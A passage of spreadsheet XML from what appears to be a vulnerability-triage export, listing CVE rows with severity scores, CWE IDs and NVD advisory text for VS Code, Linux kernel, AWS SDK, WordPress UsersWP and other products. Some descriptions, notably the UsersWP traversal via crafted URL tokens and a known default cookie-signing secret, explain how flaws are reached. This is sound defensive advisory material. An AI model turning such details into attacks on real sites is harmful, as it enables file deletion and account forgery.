          <t>CVE-2026-81357</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr"/>
      <c r="K239" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr"/>
      <c r="Q239" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81357</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81378</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr"/>
      <c r="Q240" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>Interpretation conflict in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81378</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81379</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr"/>
      <c r="Q241" s="5" t="inlineStr">
        <is>
          <t>CWE-636</t>
        </is>
      </c>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>Not failing securely ('failing open') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81379</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89090</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr"/>
      <c r="Q242" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>An unrecovered panic in the event stream header decoder in Amazon AWS SDK for Go v2 before release-2026-03-23 might allow an unauthenticated remote actor to terminate the consuming application process via a crafted event stream response frame containing a header value type outside the valid range.
To remediate this issue, users should upgrade to release-2026-03-23 or later, and patch any forked or derivative code.</t>
        </is>
      </c>
      <c r="S242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89090</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89554</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr"/>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mptcp: fix uninitialized local_id in syncookie MP_JOIN reconstruction
mptcp_token_join_cookie_init_state() restores remote_nonce, local_nonce,
backup, join_id, token and msk from the saved cookie entry when rebuilding
the request socket for a MP_JOIN 4th-ACK handled under SYN cookies, but it
does not restore local_id, even though the SYN path saved it.
subflow_ulp_clone() then reads that uninitialized field and stores it as
the joined subflow's address-ID. Because the request-sock slab is
SLAB_TYPESAFE_BY_RCU and not zeroed on allocation, the value is the stale
byte of a previously freed request socket, which an off-path peer can
influence by sending concurrent MP_JOIN SYNs. This corrupts the path
manager's id-based subflow bookkeeping for the connection.
Restore subflow_req-&gt;local_id from the cookie entry, as done for the other
fields.</t>
        </is>
      </c>
      <c r="S243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89554</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89586</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr"/>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ata: libata-scsi: fix DSM TRIM for sector sizes larger than 2048 bytes
ata_scsi_write_same_xlat() translates a SCSI WRITE SAME command with the
UNMAP bit set into an ATA DATA SET MANAGEMENT TRIM command.  The TRIM
descriptor is built by ata_format_dsm_trim_descr() into the 2048-byte
ata_scsi_rbuf staging buffer, and the number of bytes copied is compared
against the logical sector size by the caller:
	size = ata_format_dsm_trim_descr(scmd, trmax, block, n_block);
	if (size != len)		/* len == sdp-&gt;sector_size */
		goto invalid_param_len;
ata_format_dsm_trim_descr() clamps the copy length to ATA_SCSI_RBUF_SIZE
(2048).  On a device whose logical sector size exceeds that (e.g. a 4Kn
device, where sector_size == 4096) the function can never return more than
2048, while the caller expects it to return sector_size.  The comparison
therefore always fails, so every TRIM is rejected with "Parameter list
length error" and WARN_ON() splats on each attempt.  TRIM / discard is
thus completely broken on such devices.
The descriptor was incorrectly sized from the logical sector size.  A DSM
TRIM payload is a list of 512-byte pages, each holding up to
ATA_MAX_TRIM_RNUM (64) LBA Range Entries, and is independent of the logical
sector size.  The Block Limits VPD page already advertises a single such
page as the maximum WRITE SAME length (65535 * ATA_MAX_TRIM_RNUM logical
blocks), so the block layer never sends a request that needs more than one
page.
Emit exactly one 512-byte page, independent of the logical sector size,
and transfer only that page (COUNT == 1).  For a 512-byte-sector device
this is unchanged; devices with larger logical sectors now work instead of
failing every TRIM.</t>
        </is>
      </c>
      <c r="S244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89586</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89632</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr"/>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix use-before-check of ReparseDataLength in reparse_buf_ptr()
reparse_buf_ptr() reads buf-&gt;ReparseDataLength before checking that
count covers the full fixed header:
    buf = (struct reparse_data_buffer *)((u8 *)io + off);
    len = sizeof(*buf);                          /* 8 bytes */
    rdlen = le16_to_cpu(buf-&gt;ReparseDataLength); /* offset 4, 2 bytes */
    if (count &lt; len || count &lt; rdlen + len)      /* check comes after */
struct reparse_data_buffer has ReparseDataLength at offset 4.  If a
server returns OutputCount &lt; 6, the read at offset 4-5 reaches past
the end of the received data.  The off+count bounds against iov_len
were already validated, but that does not protect against count being
smaller than sizeof(*buf).
Split the check: verify count &gt;= sizeof(*buf) before reading
ReparseDataLength, then verify count covers the data region.</t>
        </is>
      </c>
      <c r="S245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89632</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89665</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr"/>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr"/>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: reject out-of-range useconds in NFSv2 SETATTR/CREATE
The NFSv2 sattr decoder converts the wire useconds to nanoseconds in
svcxdr_decode_sattr():
	iap-&gt;ia_atime.tv_nsec = tmp2 * NSEC_PER_USEC;
tmp2 is a u32 and NSEC_PER_USEC is 1000, so the product is computed in
unsigned long. On ILP32 that is 32 bits, and an out-of-range useconds
value such as 4294968 wraps to tv_nsec == 704. The corruption therefore
happens during decode, before any proc function can inspect the value,
and a later range check on tv_nsec would see an in-range result and
accept it. Rejecting in the decoder yields an RPC GARBAGE_ARGS reply.
NFSv2 defines no NFSERR_INVAL, so there is no NFS-level status to return
for a malformed time argument, and the check cannot move to the proc
function the way the v3/v4 nsec range checks do.
Guard the raw useconds before the multiplication and reject values
greater than 1000000. useconds == 1000000 is kept: it is the Sun
convention for "set to the current server time", and the in-tree Linux
NFSv2 client emits it in both the atime and the mtime field for a plain
touch / utimes(file, NULL) (see encode_sattr() and
xdr_encode_current_server_time() in fs/nfs/nfs2xdr.c). Rejecting 1000000
would turn that common operation into a hard decode failure for both
SETATTR and CREATE. 1000000 * NSEC_PER_USEC is 10^9, which does not wrap
on ILP32, so the Sun convention value passes through safely. Only
genuinely out-of-range values (&gt; 1000000) are rejected. The atime and
mtime guards are therefore symmetric.
The decoder only applied the Sun convention in the mtime block, which
clears ATTR_ATIME_SET|ATTR_MTIME_SET when mtime useconds == 1000000. If a
client puts 1000000 in the atime field but not in the mtime field, the
atime block stored an out-of-range tv_nsec (10^9) and left ATTR_ATIME_SET
set, so the bogus value reached the filesystem. Apply the convention in
the atime block as well, clearing ATTR_ATIME_SET so the server uses its
current time and ignores the value. Only ATTR_ATIME_SET is cleared there.
The mtime block keeps its existing behavior, where 1000000 means "set
both atime and mtime to now".
[ cel: various tweaks, addenda, and clean-ups ]</t>
        </is>
      </c>
      <c r="S246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89665</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89711</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr"/>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: remove flawed WARN_ON_ONCE from nfsd_mode_check
The header for commit e75b23f9e323 ("nfsd: check d_can_lookup in
fh_verify of directories") details the assumption that justified
adding the WARN_ON_ONCE to nfsd_mode_check(), that assumption is
invalid (in the case of NFS reexport).
When NFSD exports an NFS filesystem it is very possible for
nfsd_mode_check() to encounter a @dentry that doesn't have
i_op-&gt;lookup (see nfs_fhget()'s NFS_ATTR_FATTR_MOUNTPOINT and
NFS_ATTR_FATTR_V4_REFERRAL handling, and d_flags_for_inode()).
So remove nfsd_mode_check()'s WARN_ON_ONCE(). The nfserr_notdir
return on that branch must stay. It guards the subsequent
lookup_one_unlocked() -&gt; __lookup_slow() path, which calls
inode-&gt;i_op-&gt;lookup() with no NULL check, so returning nfserr_notdir
is what keeps a client LOOKUP into such a @dentry from dereferencing
a NULL method pointer.</t>
        </is>
      </c>
      <c r="S247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89711</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90451</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr"/>
      <c r="Q248" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>An example environment-configuration file ships with a fixed, publicly-known secret value used to sign authentication cookies for a bundled packet-analysis component. A deployment that copies this example file into active configuration without running the setup routine that regenerates the value will use the known default, allowing an attacker aware of the default to forge valid authentication cookies for that component.</t>
        </is>
      </c>
      <c r="S248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90451</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19991</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr"/>
      <c r="Q249" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>The UsersWP plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to, and including, 1.2.70 via the upload_file_remove() AJAX handler. The plugin stores the value of an account 'file' form field taken directly from $_POST when no real $_FILES upload is provided (process_account() calls uwp_validate_fields() and array_merges the result with the empty output of UsersWP_Files::validate_uploads()). At storage time the value is only checked with validate_file(), which passes any string that does not contain a literal '../'. When the value is later processed by upload_file_remove(), it is again gated with validate_file() and then normalized through uwp_get_file_relative_url(); that helper performs a global str_replace() of the uploads base URL against the stored URL, allowing a crafted URL containing embedded '..&lt;uploads-baseurl&gt;' tokens to collapse into '../../' traversal sequences after the last validation. The transformed value is then appended to the uploads base directory and passed to wp_delete_file() without any canonical containment check. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the affected site's server (including wp-config.</t>
        </is>
      </c>
      <c r="S249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19991</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49464</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr"/>
      <c r="Q250" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>NL Portal Backend Libraries provide backend components for Dutch government portals that interact with residents, customers, suppliers, and partner organizations. The `nl.nl-portal:taak` package from version 1.5.0 through 3.0.0 fails to verify ownership when processing the `submitTaakV2` GraphQL mutation, allowing an authenticated user who knows or guesses another user’s task ID to read its form data, overwrite its submitted data, and mark the task as completed. Version 3.0.1 contains a patch. As a workaround, block the `submitTaakV2` mutation at the API gateway or restrict the `/graphql` endpoint to trusted networks</t>
        </is>
      </c>
      <c r="S250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49464</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69438</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr"/>
      <c r="Q251" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>Incorrect conversion between numeric types in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69438</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69827</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr"/>
      <c r="Q252" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69827</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78444</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K253" s="5" t="inlineStr">
        <is>
